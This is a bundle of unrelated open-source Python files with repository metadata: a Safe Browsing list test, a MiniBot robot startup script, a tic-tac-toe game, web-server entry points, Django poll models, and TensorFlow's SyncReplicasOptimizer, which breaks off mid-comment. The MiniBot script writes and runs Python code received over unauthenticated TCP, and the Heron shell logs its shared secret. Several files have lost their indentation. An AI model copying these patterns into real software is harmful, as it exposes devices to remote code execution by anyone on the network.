# Make sure that this works properly on an empty list as well
list = sblist.List("empty-testing-list")
self.assertEqual('empty-testing-list;', list.DownloadRequest(False))
self.assertEqual('empty-testing-list;mac', list.DownloadRequest(True))
def testGetPrefixMatches(self):
self.assertSameElements([self._list.AddChunkMap()[9]['prefixaa'],
self._list.AddChunkMap()[10]['prefixaa']],
self._list.GetPrefixMatches('prefixaa'))
self.assertSameElements([self._list.AddChunkMap()[9]['prefixaa'],
self._list.AddChunkMap()[10]['prefixaa']],
self._list.GetPrefixMatches('prefixaaasdfasdf'))
self.assertSameElements([], self._list.GetPrefixMatches('prefixa'))
self.assertSameElements([self._list.AddChunkMap()[9]['prefixab']],
self._list.GetPrefixMatches('prefixabasdasdf'))
class SubEntryTest(unittest.TestCase):
def testAccessors(self):
entry = sblist.SubEntry('hash_prefix', 1, 2)
self.assertEqual('hash_prefix', entry.Prefix())
self.assertEqual(1, entry.SubNum())
self.assertEqual(2, entry.AddNum())
class AddEntryTest(unittest.TestCase):
def testSimple(self):
# Test with no full-hash.
entry = sblist.AddEntry('prefix', 1)
self.assertEqual('prefix', entry.Prefix())
self.assertEqual(None, entry.FullHash())
self.assertEqual(None, entry.GetHashTimestamp())
self.assertEqual(1, entry.AddChunkNum())
# Now set a full-hash and check that the accessors return the right thing.
entry.SetFullHash('fullhash', 42)
self.assertEqual('fullhash', entry.FullHash())
self.assertEqual(42, entry.GetHashTimestamp())
# Test with full-hash
entry = sblist.AddEntry('another_prefix', 2, 'fullhash')
self.assertEqual('another_prefix', entry.Prefix())
self.assertEqual('fullhash', entry.FullHash())
self.assertEqual(None, entry.GetHashTimestamp())
self.assertEqual(2, entry.AddChunkNum())
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "c84c1979ca26d636a47992034a56bb43",
"timestamp": "",
"source": "github",
"line_count": 234,
"max_line_length": 78,
"avg_line_length": 40.14957264957265,
"alnum_prop": 0.6623736029803087,
"repo_name": "robertobarreda/django-safe-browsing",
"id": "3c520f7e004dd2d3a51e7086aeb4f2fe70b84bc3",
"size": "9999",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "safebrowsing/vendors/google/tests/sblist_test.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "39279"
}
],
"symlink_target": ""
}
|
"""
Script which is automatically run on the MiniBot's Pi upon startup.
Must be configured in /etc/init.d/minibotinit.sh on the RPi.
"""
from minibot.bot import Bot
from minibot.hardware.communication.TCP import TCP
import minibot.hardware.communication.UDP
import json
from threading import Thread
import time
import importlib
import os
"""
Loads UserScript file.
Reloads file when it is run from GUI to reflect changes.
"""
US = importlib.import_module('minibot.scripts.UserScript')
CONFIG_LOCATION = '/home/pi/cs-minibot/minibot/configs/config.json'
p = None
def main():
print("Initializing Minibot Software")
p = None
config_file = open(CONFIG_LOCATION)
config = json.loads(config_file.read())
bot = Bot(config)
tcpInstance = TCP()
print(tcpInstance)
thread_udp = Thread(target= minibot.hardware.communication.UDP.udpBeacon)
thread_udp.start()
while True:
tcpCmd = tcpInstance.get_command()
parse_command(tcpCmd, bot)
time.sleep(0.01)
def parse_command(cmd, bot):
"""
Parses command sent by SendKV via TCP to the bot.
Sent from BaseStation.
Args:
cmd (:obj:`str`): The command name.
bot (:obj:`Bot`): Bot object to run the command on.
p (:obj:`str`): Payload or contents of command.
"""
global p
comma = cmd.find(",")
start = cmd.find("<<<<")
end = cmd.find(">>>>")
key = cmd[start + 4:comma]
value = cmd[comma + 1:end]
if key == "WHEELS":
try:
values = value.split(",")
bot.set_wheel_power(int(values[0]), int(values[1]))
except Exception as e:
print(e)
print("oh no!")
pass
elif key == "SCRIPT":
user_script_file = open("/home/pi/cs-minibot/minibot/scripts/UserScript.py",'w')
val = process_string(value)
user_script_file.write(val)
user_script_file.close()
p = spawn_script_process(p, bot)
elif key == "RUN":
filename = os.path.basename(value)
filepath = "/home/pi/cs-minibot/minibot/scripts/" + filename
print(filepath)
if os.path.isfile(filepath):
p = spawn_named_script_process(p, bot, filename.split('.')[0])
else:
print("Invalid File path")
else:
bot.extraCMD.put( (key, value) )
# Copy script sent from GUI into 'run' command
# So we can call that method to initiate the commands
def process_string(value):
cmds = value.splitlines()
str = "def run(bot):\n"
for i in range(len(cmds)):
str += " " +cmds[i] + "\n"
return str
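def _example_process_string():
    """Hedged illustration, not part of the original file.

    Shows the wrapping performed by process_string on a two-line payload as
    received from the GUI; the bot calls named here are placeholders.
    """
    payload = "bot.set_wheel_power(50, 50)\nbot.stop()"
    wrapped = process_string(payload)
    # wrapped starts with "def run(bot):" and indents each command one level
    # beneath it, ready to be written to UserScript.py and imported.
    return wrapped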
def spawn_script_process(p, bot):
time.sleep(0.1)
p = Thread(target=run_script, args=[bot])
p.start()
return p
# Return control to main after .1 seconds
def spawn_named_script_process(p,bot,script_name):
time.sleep(0.1)
p = Thread(target=run_script_with_name, args=[bot,script_name])
p.start()
# Return control to main after .1 seconds
return p
def run_script_with_name(bot,script_name):
UserScript = importlib.import_module("scripts." + script_name)
UserScript.run(bot)
def run_script(bot):
UserScript = importlib.reload(US)
UserScript.run(bot)
if __name__ == "__main__":
main()
|
{
"content_hash": "1304c01435d1eb5b23848075cf8f865f",
"timestamp": "",
"source": "github",
"line_count": 115,
"max_line_length": 88,
"avg_line_length": 28.48695652173913,
"alnum_prop": 0.6217948717948718,
"repo_name": "cornell-cup/cs-minibot",
"id": "d900d835d533062a0f3d2c59883c9630d8bb38c3",
"size": "3276",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "minibot/main.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "21918"
},
{
"name": "CSS",
"bytes": "5490"
},
{
"name": "HTML",
"bytes": "12057"
},
{
"name": "JavaScript",
"bytes": "93959"
},
{
"name": "Makefile",
"bytes": "231"
},
{
"name": "Python",
"bytes": "93494"
},
{
"name": "Shell",
"bytes": "5160"
}
],
"symlink_target": ""
}
|
import pygame
from pygame.locals import *
from Model import GameBoard
from Agent import SmartAgent as Agent
import threading
from copy import deepcopy
class GameSpace:
moveStatement = "Move #{0}: enter choice for Player {1}: {2}"
resourcesBase = "resources/"
xChar = resourcesBase+"xChar.png"
oChar = resourcesBase+"oChar.png"
bChar = resourcesBase+"bChar.png"
grid = resourcesBase+"grid.png"
# Initialize the board,number of agents and threads
def __init__(self, board, numAgents):
pygame.init()
self.size = self.width, self.height = 64*3, 64*3
self.black = 0, 0, 0
self.screen = pygame.display.set_mode(self.size)
self.board = board
self.moveNum = 0
self.agent1 = None
self.agent2 = None
if(numAgents >= 1):
self.agent2 = Agent(board)
if(numAgents == 2):
self.agent1 = Agent(board)
self.aiJob = False
self.input = ""
self.aiThread = None
# update the tictactoe visualization screen
def update_screen(self):
self.screen.fill(self.black)
for i in range(3):
for j in range(3):
char = self.board.getSquareCoordinates(i, j)
charSource = ""
if(char=='X'):
charSource = self.xChar
elif(char=='O'):
charSource = self.oChar
else:
charSource = self.bChar
img = pygame.image.load(charSource)
rec = img.get_rect()
rec.top = i*64
rec.left = j*64
self.screen.blit(img, rec)
img = pygame.image.load(self.grid)
rec = img.get_rect()
self.screen.blit(img, rec)
pygame.display.update()
def RunAI(self, agent, board, player):
self.input = agent.getNextMove(player)
self.aiJob = False
# MAIN section of game play
def main(self):
try:
while(self.board.testWin() is '.'):
self.update_screen()
pygame.event.get() #Keeps the screen alive, otherwise it times out
player = (self.moveNum%2) + 1
move = None
# For Player 1
if(player == 1):
if(self.agent1 != None):
if(self.aiJob==False and self.input==""):
self.aiJob=True
self.aiThread = threading.Thread(target=self.RunAI, args=(self.agent1, deepcopy(self.board), 'X'))
self.aiThread.start()
elif(self.aiJob==False):
move = self.input
self.input = ""
print self.moveStatement.format(self.moveNum, player, move)
else:
move = input(self.moveStatement.format(self.moveNum, player, ""))
# For Player 2
else:
if(self.agent2 != None):
if(self.aiJob==False and self.input==""):
self.aiJob=True
self.aiThread = threading.Thread(target=self.RunAI, args=(self.agent2, deepcopy(self.board), 'O'))
self.aiThread.start()
elif(self.aiJob==False):
move = self.input
self.input = ""
print self.moveStatement.format(self.moveNum, player, move)
else:
move = input(self.moveStatement.format(self.moveNum, player, ""))
try:
if(move!=None):
self.board.setSquare(move, 'X' if player==1 else 'O')
self.moveNum = self.moveNum+1
print self.board
except ValueError as e:
print e
self.update_screen();
except KeyboardInterrupt:
if(self.aiThread != None):
self.aiThread.signal = True
print "Kill command received"
print "Waiting for AI thread to terminate"
self.aiThread.join()
|
{
"content_hash": "8f3e7d29b9e5f8d228cd5d541a710288",
"timestamp": "",
"source": "github",
"line_count": 119,
"max_line_length": 105,
"avg_line_length": 27.30252100840336,
"alnum_prop": 0.6491228070175439,
"repo_name": "Digmaster/TicTacToe",
"id": "f4f946604b5260a94366806b1ce437f61c30230f",
"size": "3249",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "GameSpace.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "8392"
}
],
"symlink_target": ""
}
|
from werkzeug.contrib.fixers import ProxyFix
from app import create_app
app = create_app()
app.wsgi_app = ProxyFix(app.wsgi_app)
if __name__ == '__main__':
app.run(host='0.0.0.0')
|
{
"content_hash": "554f514cb2bef14ed72aac954a176bb6",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 44,
"avg_line_length": 20.77777777777778,
"alnum_prop": 0.6684491978609626,
"repo_name": "DoubleHYH/my_Blog",
"id": "070d51934a56efe27fdf2eeab2c5a7d491522a01",
"size": "234",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "wsgi_gunicorn.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "12403"
},
{
"name": "HTML",
"bytes": "11219"
},
{
"name": "JavaScript",
"bytes": "4310"
},
{
"name": "Python",
"bytes": "8829"
}
],
"symlink_target": ""
}
|
''' main.py '''
import logging
import tornado.ioloop
import tornado.web
from tornado.httpclient import AsyncHTTPClient
from tornado.options import define, options, parse_command_line
from heron.shell.src.python import handlers
default_handlers = [
(r"^/jmap/([0-9]+$)", handlers.JmapHandler),
(r"^/histo/([0-9]+$)", handlers.MemoryHistogramHandler),
(r"^/pmap/([0-9]+$)", handlers.PmapHandler),
(r"^/jstack/([0-9]+$)", handlers.JstackHandler),
(r"^/pid/(.*)", handlers.PidHandler),
(r"^/browse/(.*)", handlers.BrowseHandler),
(r"^/file/(.*)", handlers.FileHandler),
(r"^/filedata/(.*)", handlers.FileDataHandler),
(r"^/filestats/(.*)", handlers.FileStatsHandler),
(r"^/download/(.*)", handlers.DownloadHandler),
(r"^/killexecutor", handlers.KillExecutorHandler),
(r"^/health", handlers.HealthHandler),
]
# pylint: disable=dangerous-default-value
def run(url_to_handlers=default_handlers):
define("port", default=9999, help="Runs on the given port", type=int)
define("secret", default='', help="Shared secret for /killexecutor", type=str)
parse_command_line()
logger = logging.getLogger(__file__)
logger.info("Starting Heron Shell")
logger.info("Shared secret for /killexecutor: %s", options.secret)
AsyncHTTPClient.configure(None, defaults=dict(request_timeout=120.0))
app = tornado.web.Application(url_to_handlers)
app.listen(options.port)
tornado.ioloop.IOLoop.instance().start()
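# Hedged sketch, not part of the original file: run() accepts a custom mapping,
# so a deployment can extend the default routes before starting the shell.
# The /ping route below is purely illustrative.
def _example_run_with_extra_route():
  class _PingHandler(tornado.web.RequestHandler):
    def get(self):
      self.write("pong")
  run(default_handlers + [(r"^/ping$", _PingHandler)])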
if __name__ == '__main__':
run()
|
{
"content_hash": "8699fcd0f7bfea00420bc7b4ee34552b",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 80,
"avg_line_length": 35.523809523809526,
"alnum_prop": 0.6816353887399463,
"repo_name": "huijunwu/heron",
"id": "c476eca56e7eca970688684eacc67998a5ee1db8",
"size": "2343",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "heron/shell/src/python/main.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "12383"
},
{
"name": "C++",
"bytes": "1744417"
},
{
"name": "CSS",
"bytes": "69001"
},
{
"name": "Dockerfile",
"bytes": "946"
},
{
"name": "HCL",
"bytes": "5314"
},
{
"name": "HTML",
"bytes": "36787"
},
{
"name": "Java",
"bytes": "5102572"
},
{
"name": "JavaScript",
"bytes": "1170225"
},
{
"name": "M4",
"bytes": "18741"
},
{
"name": "Makefile",
"bytes": "298"
},
{
"name": "Perl",
"bytes": "9298"
},
{
"name": "Python",
"bytes": "1470967"
},
{
"name": "Scala",
"bytes": "134586"
},
{
"name": "Shell",
"bytes": "236062"
},
{
"name": "Smarty",
"bytes": "528"
},
{
"name": "Starlark",
"bytes": "269247"
}
],
"symlink_target": ""
}
|
from . import proputils
class PropertyTestMixin(object):
def setUp(self):
self.C = self.new_class()
def do_test_set_and_delete(self, c):
c.p = 'x'
self.assertEquals('x', c.p)
c.p = 'y'
self.assertEquals('y', c.p)
del c.p
self.assertRaises(AttributeError, getattr, c, 'p')
self.assertRaises(AttributeError, delattr, c, 'p')
def testInitialState_ClassAttributes(self):
self.assertRaises(AttributeError, getattr, self.C.p, 'name')
self.assertRaises(AttributeError, getattr, self.C.p, 'class')
def testInitialState_Get(self):
c = self.C()
self.assertRaises(AttributeError, getattr, c, 'p')
def testInitialState_Set(self):
c = self.C()
self.assertRaises(AttributeError, setattr, c, 'p', 1)
def testInitialState_Delete(self):
c = self.C()
self.assertRaises(AttributeError, delattr, c, 'p')
def testGetSetAndDelete(self):
proputils.config_props(self.C)
c = self.C()
self.assertRaises(AttributeError, getattr, c, 'p')
self.assertRaises(AttributeError, delattr, c, 'p')
self.do_test_set_and_delete(c)
|
{
"content_hash": "1dc9b987415765dcc9aaf93758fa3fc5",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 65,
"avg_line_length": 26.238095238095237,
"alnum_prop": 0.6687840290381125,
"repo_name": "slobberchops/sordid-tools",
"id": "f3e1a1a6c51a727604d4d66870193724da71dcd1",
"size": "1103",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "props/src/sordid/props/prop_testutils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "81039"
}
],
"symlink_target": ""
}
|
import datetime
from django.db import models
from django.utils import timezone
# Create your models here.
class Poll(models.Model):
question = models.CharField(max_length=200)
pub_date = models.DateTimeField('date published')
def __unicode__(self):
return self.question
def was_published_recently(self):
now = timezone.now()
return now - datetime.timedelta(days=1) <= self.pub_date < now
was_published_recently.admin_order_field = 'pub_date'
was_published_recently.boolean = True
was_published_recently.short_description = 'Published recently ?'
class Choice(models.Model):
poll = models.ForeignKey(Poll)
choice_text = models.CharField(max_length=200)
votes = models.IntegerField(default=0)
def __unicode__(self):
return self.choice_text
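# --- Illustrative sketch, not part of the original models module ---
# How was_published_recently() behaves, e.g. from "manage.py shell"; the
# question text is a placeholder and no database write is needed because the
# method only inspects pub_date.
def _was_published_recently_example():
    poll = Poll(question="Example question?", pub_date=timezone.now())
    return poll.was_published_recently()  # True: pub_date is within the last day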
|
{
"content_hash": "dcef8054616ec617a960d2dc1f93a6a7",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 70,
"avg_line_length": 28.896551724137932,
"alnum_prop": 0.6837708830548926,
"repo_name": "linzeyang/Django_Tutorial",
"id": "535cdb988b74f50dc68a25681374dcec420cd4c6",
"size": "838",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "polls/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "125"
},
{
"name": "Python",
"bytes": "16536"
}
],
"symlink_target": ""
}
|
"""Synchronize replicas for training."""
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import optimizer
from tensorflow.python.training import queue_runner
from tensorflow.python.training import session_manager
from tensorflow.python.training import session_run_hook
from tensorflow.python.util import deprecation
from tensorflow.python.util.tf_export import tf_export
# Please note that the gradients from replicas are averaged instead of summed
# (as in the old sync_replicas_optimizer) so you need to increase the learning
# rate according to the number of replicas. This change is introduced to be
# consistent with how gradients are aggregated (averaged) within a batch in a
# replica.
@tf_export(v1=["train.SyncReplicasOptimizer"])
class SyncReplicasOptimizer(optimizer.Optimizer):
"""Class to synchronize, aggregate gradients and pass them to the optimizer.
This class is deprecated. For synchronous training, please use [Distribution
Strategies](https://github.com/tensorflow/tensorflow/tree/master/tensorflow/contrib/distribute).
In a typical asynchronous training environment, it's common to have some
stale gradients. For example, with a N-replica asynchronous training,
gradients will be applied to the variables N times independently. Depending
on each replica's training speed, some gradients might be calculated from
copies of the variable from several steps back (N-1 steps on average). This
optimizer avoids stale gradients by collecting gradients from all replicas,
averaging them, then applying them to the variables in one shot, after
which replicas can fetch the new variables and continue.
The following accumulators/queue are created:
* N `gradient accumulators`, one per variable to train. Gradients are pushed
to them and the chief worker will wait until enough gradients are collected
and then average them before applying to variables. The accumulator will
drop all stale gradients (more details in the accumulator op).
* 1 `token` queue where the optimizer pushes the new global_step value after
all variables are updated.
The following local variable is created:
* `sync_rep_local_step`, one per replica. Compared against the global_step in
each accumulator to check for staleness of the gradients.
The optimizer adds nodes to the graph to collect gradients and pause the
trainers until variables are updated.
For the Parameter Server job:
1. An accumulator is created for each variable, and each replica pushes the
gradients into the accumulators instead of directly applying them to the
variables.
2. Each accumulator averages once enough gradients (replicas_to_aggregate)
have been accumulated.
3. Apply the averaged gradients to the variables.
4. Only after all variables have been updated, increment the global step.
5. Only after step 4, pushes `global_step` in the `token_queue`, once for
each worker replica. The workers can now fetch the global step, use it to
update its local_step variable and start the next batch. Please note that
some workers can consume multiple minibatches, while some may not consume
even one. This is because each worker fetches minibatches as long as
a token exists. If one worker is stuck for some reason and does not
consume a token, another worker can use it.
For the replicas:
1. Start a step: fetch variables and compute gradients.
2. Once the gradients have been computed, push them into gradient
accumulators. Each accumulator will check the staleness and drop the stale.
3. After pushing all the gradients, dequeue an updated value of global_step
from the token queue and record that step to its local_step variable. Note
that this is effectively a barrier.
4. Start the next batch.
### Usage
```python
# Create any optimizer to update the variables, say a simple SGD:
opt = GradientDescentOptimizer(learning_rate=0.1)
# Wrap the optimizer with sync_replicas_optimizer with 50 replicas: at each
# step the optimizer collects 50 gradients before applying to variables.
# Note that if you want to have 2 backup replicas, you can change
# total_num_replicas=52 and make sure this number matches how many physical
# replicas you started in your job.
opt = tf.compat.v1.train.SyncReplicasOptimizer(opt, replicas_to_aggregate=50,
total_num_replicas=50)
# Some models have startup_delays to help stabilize the model but when using
# sync_replicas training, set it to 0.
# Now you can call `minimize()` or `compute_gradients()` and
# `apply_gradients()` normally
training_op = opt.minimize(total_loss, global_step=self.global_step)
# You can create the hook which handles initialization and queues.
sync_replicas_hook = opt.make_session_run_hook(is_chief)
```
In the training program, every worker will run the train_op as if not
synchronized.
```python
with training.MonitoredTrainingSession(
master=workers[worker_id].target, is_chief=is_chief,
hooks=[sync_replicas_hook]) as mon_sess:
while not mon_sess.should_stop():
mon_sess.run(training_op)
```
To use SyncReplicasOptimizer with an `Estimator`, you need to send
sync_replicas_hook while calling the fit.
```python
my_estimator = DNNClassifier(..., optimizer=opt)
my_estimator.fit(..., hooks=[sync_replicas_hook])
```
"""
@deprecation.deprecated(
None, "The `SyncReplicaOptimizer` class is deprecated. For synchronous "
"training, please use [Distribution Strategies](https://github.com/"
"tensorflow/tensorflow/tree/master/tensorflow/contrib/distribute).",
warn_once=True)
def __init__(self,
opt,
replicas_to_aggregate,
total_num_replicas=None,
variable_averages=None,
variables_to_average=None,
use_locking=False,
name="sync_replicas"):
"""Construct a sync_replicas optimizer.
Args:
opt: The actual optimizer that will be used to compute and apply the
gradients. Must be one of the Optimizer classes.
replicas_to_aggregate: number of replicas to aggregate for each variable
update.
total_num_replicas: Total number of tasks/workers/replicas, could be
different from replicas_to_aggregate.
If total_num_replicas > replicas_to_aggregate: it is backup_replicas +
replicas_to_aggregate.
If total_num_replicas < replicas_to_aggregate: Replicas compute
multiple batches per update to variables.
variable_averages: Optional `ExponentialMovingAverage` object, used to
maintain moving averages for the variables passed in
`variables_to_average`.
variables_to_average: a list of variables that need to be averaged. Only
needed if variable_averages is passed in.
use_locking: If True use locks for update operation.
name: string. Optional name of the returned operation.
"""
if total_num_replicas is None:
total_num_replicas = replicas_to_aggregate
super(SyncReplicasOptimizer, self).__init__(use_locking, name)
logging.info(
"SyncReplicasV2: replicas_to_aggregate=%s; total_num_replicas=%s",
replicas_to_aggregate, total_num_replicas)
self._opt = opt
self._replicas_to_aggregate = replicas_to_aggregate
self._gradients_applied = False
self._variable_averages = variable_averages
self._variables_to_average = variables_to_average
self._total_num_replicas = total_num_replicas
self._tokens_per_step = max(total_num_replicas, replicas_to_aggregate)
self._global_step = None
self._sync_token_queue = None
# The synchronization op will be executed in a queue runner which should
# only be executed by one of the replicas (usually the chief).
self._chief_queue_runner = None
# Remember which accumulator is on which device to set the initial step in
# the accumulator to be global step. This list contains list of the
# following format: (accumulator, device).
self._accumulator_list = []
def compute_gradients(self, *args, **kwargs):
"""Compute gradients of "loss" for the variables in "var_list".
This simply wraps the compute_gradients() from the real optimizer. The
gradients will be aggregated in the apply_gradients() so that user can
modify the gradients like clipping with per replica global norm if needed.
The global norm with aggregated gradients can be bad as one replica's huge
gradients can hurt the gradients from other replicas.
Args:
*args: Arguments for compute_gradients().
**kwargs: Keyword arguments for compute_gradients().
Returns:
A list of (gradient, variable) pairs.
"""
return self._opt.compute_gradients(*args, **kwargs)
def apply_gradients(self, grads_and_vars, global_step=None, name=None):
"""Apply gradients to variables.
This contains most of the synchronization implementation and also wraps the
apply_gradients() from the real optimizer.
Args:
grads_and_vars: List of (gradient, variable) pairs as returned by
compute_gradients().
global_step: Optional Variable to increment by one after the
variables have been updated.
name: Optional name for the returned operation. Default to the
name passed to the Optimizer constructor.
Returns:
train_op: The op to dequeue a token so the replicas can exit this batch
and start the next one. This is executed by each replica.
Raises:
ValueError: If the grads_and_vars is empty.
ValueError: If global step is not provided, the staleness cannot be
checked.
"""
if not grads_and_vars:
raise ValueError("Must supply at least one variable")
if global_step is None:
raise ValueError("Global step is required to check staleness")
self._global_step = global_step
train_ops = []
aggregated_grad = []
var_list = []
# local_anchor op will be placed on this worker task by default.
local_anchor = control_flow_ops.no_op()
# Colocating local_step variable prevents it being placed on the PS.
distribution_strategy = distribution_strategy_context.get_strategy()
with distribution_strategy.extended.colocate_vars_with(local_anchor):
self._local_step = variable_scope.variable(
initial_value=0,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
dtype=global_step.dtype.base_dtype,
name="sync_rep_local_step")
self.local_step_init_op = state_ops.assign(self._local_step, global_step)
chief_init_ops = [self.local_step_init_op]
self.ready_for_local_init_op = variables.report_uninitialized_variables(
variables.global_variables())
with ops.name_scope(None, self._name):
for grad, var in grads_and_vars:
var_list.append(var)
with ops.device(var.device):
# Dense gradients.
if grad is None:
aggregated_grad.append(None) # pass-through.
continue
elif isinstance(grad, ops.Tensor):
grad_accum = data_flow_ops.ConditionalAccumulator(
grad.dtype,
shape=var.get_shape(),
shared_name=var.name + "/grad_accum")
train_ops.append(grad_accum.apply_grad(
grad, local_step=self._local_step))
aggregated_grad.append(grad_accum.take_grad(
self._replicas_to_aggregate))
else:
if not isinstance(grad, indexed_slices.IndexedSlices):
raise ValueError("Unknown grad type!")
grad_accum = data_flow_ops.SparseConditionalAccumulator(
grad.dtype, shape=(), shared_name=var.name + "/grad_accum")
train_ops.append(grad_accum.apply_indexed_slices_grad(
grad, local_step=self._local_step))
aggregated_grad.append(grad_accum.take_indexed_slices_grad(
self._replicas_to_aggregate))
self._accumulator_list.append((grad_accum, var.device))
aggregated_grads_and_vars = zip(aggregated_grad, var_list)
# sync_op will be assigned to the same device as the global step.
with ops.device(global_step.device), ops.name_scope(""):
update_op = self._opt.apply_gradients(aggregated_grads_and_vars,
global_step)
# Create token queue.
with ops.device(global_step.device), ops.name_scope(""):
sync_token_queue = (
data_flow_ops.FIFOQueue(-1,
global_step.dtype.base_dtype,
shapes=(),
name="sync_token_q",
shared_name="sync_token_q"))
self._sync_token_queue = sync_token_queue
with ops.device(global_step.device), ops.name_scope(""):
# Replicas have to wait until they can get a token from the token queue.
with ops.control_dependencies(train_ops):
token = sync_token_queue.dequeue()
train_op = state_ops.assign(self._local_step, token)
with ops.control_dependencies([update_op]):
# Sync_op needs to insert tokens to the token queue at the end of the
# step so the replicas can fetch them to start the next step.
tokens = array_ops.fill([self._tokens_per_step], global_step)
sync_op = sync_token_queue.enqueue_many((tokens,))
if self._variable_averages is not None:
with ops.control_dependencies([sync_op]), ops.name_scope(""):
sync_op = self._variable_averages.apply(
self._variables_to_average)
self._chief_queue_runner = queue_runner.QueueRunner(
sync_token_queue, [sync_op])
for accum, dev in self._accumulator_list:
with ops.device(dev):
chief_init_ops.append(
accum.set_global_step(
global_step, name="SetGlobalStep"))
self.chief_init_op = control_flow_ops.group(*(chief_init_ops))
self._gradients_applied = True
return train_op
def get_chief_queue_runner(self):
"""Returns the QueueRunner for the chief to execute.
This includes the operations to synchronize replicas: aggregate gradients,
apply to variables, increment global step, insert tokens to token queue.
Note that this can only be called after calling apply_gradients() which
actually generates this queuerunner.
Returns:
A `QueueRunner` for chief to execute.
Raises:
ValueError: If this is called before apply_gradients().
"""
if self._gradients_applied is False:
raise ValueError("Should be called after apply_gradients().")
return self._chief_queue_runner
def get_slot(self, *args, **kwargs):
"""Return a slot named "name" created for "var" by the Optimizer.
This simply wraps the get_slot() from the actual optimizer.
Args:
*args: Arguments for get_slot().
**kwargs: Keyword arguments for get_slot().
Returns:
The `Variable` for the slot if it was created, `None` otherwise.
"""
return self._opt.get_slot(*args, **kwargs)
def variables(self):
"""Fetches a list of optimizer variables in the default graph.
This wraps `variables()` from the actual optimizer. It does not include
the `SyncReplicasOptimizer`'s local step.
Returns:
A list of variables.
"""
return self._opt.variables()
def get_slot_names(self, *args, **kwargs):
"""Return a list of the names of slots created by the `Optimizer`.
This simply wraps the get_slot_names() from the actual optimizer.
Args:
*args: Arguments for get_slot().
**kwargs: Keyword arguments for get_slot().
Returns:
A list of strings.
"""
return self._opt.get_slot_names(*args, **kwargs)
def get_init_tokens_op(self, num_tokens=-1):
"""Returns the op to fill the sync_token_queue with the tokens.
This is supposed to be executed in the beginning of the chief/sync thread
so that even if the total_num_replicas is less than replicas_to_aggregate,
the model can still proceed as the replicas can compute multiple steps per
variable update. Make sure:
`num_tokens >= replicas_to_aggregate - total_num_replicas`.
Args:
num_tokens: Number of tokens to add to the queue.
Returns:
An op for the chief/sync replica to fill the token queue.
Raises:
ValueError: If this is called before apply_gradients().
      ValueError: If num_tokens is smaller than replicas_to_aggregate -
total_num_replicas.
"""
if self._gradients_applied is False:
raise ValueError(
"get_init_tokens_op() should be called after apply_gradients().")
tokens_needed = self._replicas_to_aggregate - self._total_num_replicas
if num_tokens == -1:
num_tokens = self._replicas_to_aggregate
elif num_tokens < tokens_needed:
raise ValueError(
"Too few tokens to finish the first step: %d (given) vs %d (needed)" %
(num_tokens, tokens_needed))
if num_tokens > 0:
with ops.device(self._global_step.device), ops.name_scope(""):
tokens = array_ops.fill([num_tokens], self._global_step)
init_tokens = self._sync_token_queue.enqueue_many((tokens,))
else:
init_tokens = control_flow_ops.no_op(name="no_init_tokens")
return init_tokens
def make_session_run_hook(self, is_chief, num_tokens=-1):
"""Creates a hook to handle SyncReplicasHook ops such as initialization."""
return _SyncReplicasOptimizerHook(self, is_chief, num_tokens)
class _SyncReplicasOptimizerHook(session_run_hook.SessionRunHook):
"""A SessionRunHook handles ops related to SyncReplicasOptimizer."""
def __init__(self, sync_optimizer, is_chief, num_tokens):
"""Creates hook to handle SyncReplicasOptimizer initialization ops.
Args:
sync_optimizer: `SyncReplicasOptimizer` which this hook will initialize.
is_chief: `Bool`, whether is this a chief replica or not.
num_tokens: Number of tokens to add to the queue.
"""
self._sync_optimizer = sync_optimizer
self._is_chief = is_chief
self._num_tokens = num_tokens
def begin(self):
if self._sync_optimizer._gradients_applied is False: # pylint: disable=protected-access
raise ValueError(
"SyncReplicasOptimizer.apply_gradient should be called before using "
"the hook.")
if self._is_chief:
self._local_init_op = self._sync_optimizer.chief_init_op
self._ready_for_local_init_op = (
self._sync_optimizer.ready_for_local_init_op)
self._q_runner = self._sync_optimizer.get_chief_queue_runner()
self._init_tokens_op = self._sync_optimizer.get_init_tokens_op(
self._num_tokens)
else:
self._local_init_op = self._sync_optimizer.local_step_init_op
self._ready_for_local_init_op = (
self._sync_optimizer.ready_for_local_init_op)
self._q_runner = None
self._init_tokens_op = None
def after_create_session(self, session, coord):
"""Runs SyncReplicasOptimizer initialization ops."""
local_init_success, msg = session_manager._ready( # pylint: disable=protected-access
self._ready_for_local_init_op, session,
"Model is not ready for SyncReplicasOptimizer local init.")
if not local_init_success:
raise RuntimeError(
"Init operations did not make model ready for SyncReplicasOptimizer "
"local_init. Init op: %s, error: %s" %
(self._local_init_op.name, msg))
session.run(self._local_init_op)
if self._init_tokens_op is not None:
session.run(self._init_tokens_op)
if self._q_runner is not None:
self._q_runner.create_threads(
session, coord=coord, daemon=True, start=True)
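# --- Illustrative sketch, not part of the original module ---
# The bookkeeping enforced by get_init_tokens_op(): when there are fewer
# physical workers than replicas_to_aggregate, the chief must pre-fill the
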